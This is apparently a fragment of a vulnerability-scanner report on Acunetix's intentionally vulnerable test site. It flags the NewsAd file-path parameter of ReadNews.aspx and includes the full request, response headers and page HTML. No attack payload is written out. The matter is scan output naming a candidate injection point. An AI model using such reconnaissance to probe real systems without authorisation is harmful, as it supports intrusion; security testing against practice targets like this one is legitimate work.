href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div 